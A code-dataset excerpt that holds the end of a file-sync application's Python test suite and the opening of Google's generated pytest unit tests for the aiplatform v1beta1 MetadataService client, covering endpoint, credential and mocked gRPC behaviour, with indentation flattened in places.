# os.utime(in_file, (now, now))
            atime = 0
            mtime = 0
for r in range(self.app.nr_retries):
                self.app.attempt = r
try:
mtime = os.path.getmtime(out_file)
except OSError:
pass
try:
atime = os.path.getatime(out_file)
except OSError:
pass
logging.debug("Comparing time: %s. atime: %d = %d, mtime: %d = %d" % (out_file, now, atime, now, mtime))
                if mtime == now:  # all good
                    break
self.app.sync()
logging.debug("Comparing time for %s failed! Retrying [%d/%d] .." % (out_file, r + 1, self.nr_retries))
#self.assertEqual(atime, now, "atime values are different")
self.assertEqual(mtime, now, "mtime values are different")
self.assertTrue(self.app.is_alive(), "Test application is not running")
def test_create_rename_delete_unicode_files_dirs(self):
"""
        create files and directories with different amounts of content,
        using Unicode encoding for file / directory names,
        compare the directories in both sync folders,
        rename the files and directories,
        compare the directories in both sync folders again,
        remove them, and check that they are removed from the second folder
"""
logging.info("Launching test_create_rename_delete_unicode_files_dirs test")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.change_folders()
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create files
l_files = self.files_create(generate_unicode_name)
self.assertIsNotNone(l_files, "Creating files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# renaming
self.assertTrue(self.files_rename(l_files, generate_unicode_name), "Renaming files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.files_check(l_files), "Comparing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove files
self.assertTrue(self.files_remove(l_files), "Removing files")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# create dirs
l_dirs = self.dirs_create(generate_unicode_name)
self.assertIsNotNone(l_dirs, "Creating directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# rename dirs
self.assertTrue(self.dirs_rename(l_dirs, generate_unicode_name), "Rename directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
self.app.sync()
# comparing
self.assertTrue(self.dirs_check(l_dirs), "Comparing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# remove dirs
self.assertTrue(self.dirs_remove(l_dirs), "Removing directories")
self.assertTrue(self.app.is_alive(), "Test application is not running")
# make sure remote folders are empty
self.assertTrue(self.dirs_check_empty(), "Checking if remote folders are empty")
self.assertTrue(self.app.is_alive(), "Test application is not running")
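# `generate_unicode_name` and `get_random_str` are helpers defined elsewhere
# in this suite; a purely illustrative sketch of the former could be:
#
#   import random
#
#   def generate_unicode_name(length=8):
#       # mix letters from a few non-ASCII scripts to stress name handling
#       pool = [chr(c) for c in range(0x0410, 0x0450)]   # Cyrillic block
#       pool += [chr(c) for c in range(0x3041, 0x3097)]  # Hiragana block
#       return ''.join(random.choice(pool) for _ in range(length))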
----------------------------------------------------------------
[dataset record boundary - per-file quality-signal values omitted]
8111d695103ccf4e263a59225cc3c831d4a8df03 | 427,702 | py | Python
tests/unit/gapic/aiplatform_v1beta1/test_metadata_service.py
sararob/python-aiplatform | e64cd5588848a4dcd9117ff905e9569576541b69 | ["Apache-2.0"]
----------------------------------------------------------------
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
# try/except added for compatibility with python < 3.8
try:
from unittest import mock
from unittest.mock import AsyncMock
except ImportError:
import mock
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.api_core import path_template
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.aiplatform_v1beta1.services.metadata_service import (
MetadataServiceAsyncClient,
)
from google.cloud.aiplatform_v1beta1.services.metadata_service import (
MetadataServiceClient,
)
from google.cloud.aiplatform_v1beta1.services.metadata_service import pagers
from google.cloud.aiplatform_v1beta1.services.metadata_service import transports
from google.cloud.aiplatform_v1beta1.types import artifact
from google.cloud.aiplatform_v1beta1.types import artifact as gca_artifact
from google.cloud.aiplatform_v1beta1.types import context
from google.cloud.aiplatform_v1beta1.types import context as gca_context
from google.cloud.aiplatform_v1beta1.types import encryption_spec
from google.cloud.aiplatform_v1beta1.types import event
from google.cloud.aiplatform_v1beta1.types import execution
from google.cloud.aiplatform_v1beta1.types import execution as gca_execution
from google.cloud.aiplatform_v1beta1.types import lineage_subgraph
from google.cloud.aiplatform_v1beta1.types import metadata_schema
from google.cloud.aiplatform_v1beta1.types import metadata_schema as gca_metadata_schema
from google.cloud.aiplatform_v1beta1.types import metadata_service
from google.cloud.aiplatform_v1beta1.types import metadata_store
from google.cloud.aiplatform_v1beta1.types import metadata_store as gca_metadata_store
from google.cloud.aiplatform_v1beta1.types import operation as gca_operation
from google.cloud.location import locations_pb2
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import options_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import struct_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert MetadataServiceClient._get_default_mtls_endpoint(None) is None
assert (
MetadataServiceClient._get_default_mtls_endpoint(api_endpoint)
== api_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert (
MetadataServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
)
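# A minimal sketch of the conversion the assertions above exercise
# (hypothetical helper, not the client's actual implementation): insert an
# "mtls" label after the leading sub-domain of *.googleapis.com endpoints
# and leave every other endpoint untouched.
def _sketch_default_mtls_endpoint(api_endpoint):
    if api_endpoint is None or not api_endpoint.endswith(".googleapis.com"):
        return api_endpoint
    first, rest = api_endpoint.split(".", 1)
    if rest.startswith("mtls."):
        return api_endpoint  # already an mtls endpoint
    return f"{first}.mtls.{rest}"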
@pytest.mark.parametrize(
"client_class,transport_name",
[
(MetadataServiceClient, "grpc"),
(MetadataServiceAsyncClient, "grpc_asyncio"),
],
)
def test_metadata_service_client_from_service_account_info(
client_class, transport_name
):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info, transport=transport_name)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == ("aiplatform.googleapis.com:443")
@pytest.mark.parametrize(
"transport_class,transport_name",
[
(transports.MetadataServiceGrpcTransport, "grpc"),
(transports.MetadataServiceGrpcAsyncIOTransport, "grpc_asyncio"),
],
)
def test_metadata_service_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize(
"client_class,transport_name",
[
(MetadataServiceClient, "grpc"),
(MetadataServiceAsyncClient, "grpc_asyncio"),
],
)
def test_metadata_service_client_from_service_account_file(
client_class, transport_name
):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json(
"dummy/file/path.json", transport=transport_name
)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == ("aiplatform.googleapis.com:443")
def test_metadata_service_client_get_transport_class():
transport = MetadataServiceClient.get_transport_class()
available_transports = [
transports.MetadataServiceGrpcTransport,
]
assert transport in available_transports
transport = MetadataServiceClient.get_transport_class("grpc")
assert transport == transports.MetadataServiceGrpcTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(MetadataServiceClient, transports.MetadataServiceGrpcTransport, "grpc"),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
@mock.patch.object(
MetadataServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceClient),
)
@mock.patch.object(
MetadataServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceAsyncClient),
)
def test_metadata_service_client_client_options(
client_class, transport_class, transport_name
):
# Check that if a transport instance is provided we won't create a new one.
with mock.patch.object(MetadataServiceClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if a transport name (str) is provided we will create a new one.
with mock.patch.object(MetadataServiceClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name, client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class(transport=transport_name)
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class(transport=transport_name)
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
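# A condensed sketch of the endpoint-selection rules the cases above walk
# through (hypothetical helper, not part of the client surface):
def _sketch_select_endpoint(use_mtls_env, have_client_cert, default, default_mtls):
    if use_mtls_env == "never":
        return default
    if use_mtls_env == "always":
        return default_mtls
    if use_mtls_env == "auto":
        return default_mtls if have_client_cert else default
    raise MutualTLSChannelError(
        f"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value: {use_mtls_env}"
    )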
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
"true",
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
"true",
),
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
"false",
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
"false",
),
],
)
@mock.patch.object(
MetadataServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceClient),
)
@mock.patch.object(
MetadataServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_metadata_service_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class(transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class", [MetadataServiceClient, MetadataServiceAsyncClient]
)
@mock.patch.object(
MetadataServiceClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceClient),
)
@mock.patch.object(
MetadataServiceAsyncClient,
"DEFAULT_ENDPOINT",
modify_default_endpoint(MetadataServiceAsyncClient),
)
def test_metadata_service_client_get_mtls_endpoint_and_cert_source(client_class):
mock_client_cert_source = mock.Mock()
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source == mock_client_cert_source
# Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
mock_client_cert_source = mock.Mock()
mock_api_endpoint = "foo"
options = client_options.ClientOptions(
client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
)
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
options
)
assert api_endpoint == mock_api_endpoint
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_ENDPOINT
assert cert_source is None
# Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=mock_client_cert_source,
):
(
api_endpoint,
cert_source,
) = client_class.get_mtls_endpoint_and_cert_source()
assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
assert cert_source == mock_client_cert_source
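# Outside of tests, the typical call shape mirrors the cases above: the
# classmethod returns the endpoint to use plus a cert source (or None)
# derived from client options and the environment, e.g. (illustrative):
#
#   endpoint, cert_source = MetadataServiceClient.get_mtls_endpoint_and_cert_source()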
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[
(MetadataServiceClient, transports.MetadataServiceGrpcTransport, "grpc"),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
),
],
)
def test_metadata_service_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
grpc_helpers,
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_metadata_service_client_client_options_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
def test_metadata_service_client_client_options_from_dict():
with mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceGrpcTransport.__init__"
) as grpc_transport:
grpc_transport.return_value = None
client = MetadataServiceClient(
client_options={"api_endpoint": "squid.clam.whelk"}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,grpc_helpers",
[
(
MetadataServiceClient,
transports.MetadataServiceGrpcTransport,
"grpc",
grpc_helpers,
),
(
MetadataServiceAsyncClient,
transports.MetadataServiceGrpcAsyncIOTransport,
"grpc_asyncio",
grpc_helpers_async,
),
],
)
def test_metadata_service_client_create_channel_credentials_file(
client_class, transport_class, transport_name, grpc_helpers
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options, transport=transport_name)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
always_use_jwt_access=True,
)
# test that the credentials from file are saved and used as the credentials.
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch.object(
google.auth, "default", autospec=True
) as adc, mock.patch.object(
grpc_helpers, "create_channel"
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
file_creds = ga_credentials.AnonymousCredentials()
load_creds.return_value = (file_creds, None)
adc.return_value = (creds, None)
client = client_class(client_options=options, transport=transport_name)
create_channel.assert_called_with(
"aiplatform.googleapis.com:443",
credentials=file_creds,
credentials_file=None,
quota_project_id=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
scopes=None,
default_host="aiplatform.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateMetadataStoreRequest,
dict,
],
)
def test_create_metadata_store(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
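# For reference (illustrative, not exercised here because the stub is
# mocked): against a real backend the returned future resolves to the
# created resource via the standard long-running-operation pattern, e.g.:
#
#   operation = client.create_metadata_store(request)
#   metadata_store = operation.result()  # blocks until the LRO completes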
def test_create_metadata_store_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
client.create_metadata_store()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataStoreRequest()
@pytest.mark.asyncio
async def test_create_metadata_store_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.CreateMetadataStoreRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataStoreRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_metadata_store_async_from_dict():
await test_create_metadata_store_async(request_type=dict)
def test_create_metadata_store_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataStoreRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_metadata_store_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.CreateMetadataStoreRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.create_metadata_store(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_create_metadata_store_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_metadata_store(
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_store
mock_val = gca_metadata_store.MetadataStore(name="name_value")
assert arg == mock_val
arg = args[0].metadata_store_id
mock_val = "metadata_store_id_value"
assert arg == mock_val
def test_create_metadata_store_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_metadata_store(
metadata_service.CreateMetadataStoreRequest(),
parent="parent_value",
metadata_store=gca_metadata_store.MetadataStore(name="name_value"),
metadata_store_id="metadata_store_id_value",
)
@pytest.mark.asyncio
async def test_create_metadata_store_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_store), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
